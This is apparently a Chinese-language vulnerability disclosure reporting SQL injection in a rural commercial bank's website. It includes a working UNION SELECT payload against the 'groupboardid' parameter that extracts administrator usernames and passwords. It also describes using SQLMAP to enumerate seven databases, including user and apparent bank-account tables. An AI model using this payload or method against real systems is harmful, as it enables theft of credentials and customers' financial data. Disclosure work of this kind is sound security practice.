济源农商行主站存在SQL注入,导致大量数据库敏感信息泄露。(个人感觉你们的网站问题较多..)
SQL注入地址:http://**.**.**.**/bbs/boardrule.php?groupboardid=1(注入参数为groupboardid)
手工构造如下URL提交测试:http://**.**.**.**/bbs/boardrule.php?groupboardid=1/**/union/**/select/**/concat(0xBAF3CCA8D3C3BBA7C3FBA3BA,username,0x202020C3DCC2EBA3BA,password)/**/from%20dv_admin%20where%20id%20between%201%20and%204/**/admin/index.php
系统报错如下,感觉存在SQL注入。
二话不说,扔到SQLMAP跑一下,果然存在
一共包含7个数据库
当前数据库为jynshcom,139个表
管理员表dv_admin
看一下jynshcom数据库的user表
newbank包含102个表,该表应该包含用户银行账户信息,就不拖库了。
ydbg包含87表
xznsyh包含130个表
随便看一下xznsyh的users表
OK,我只想说,我不拖库,不给20rank合适吗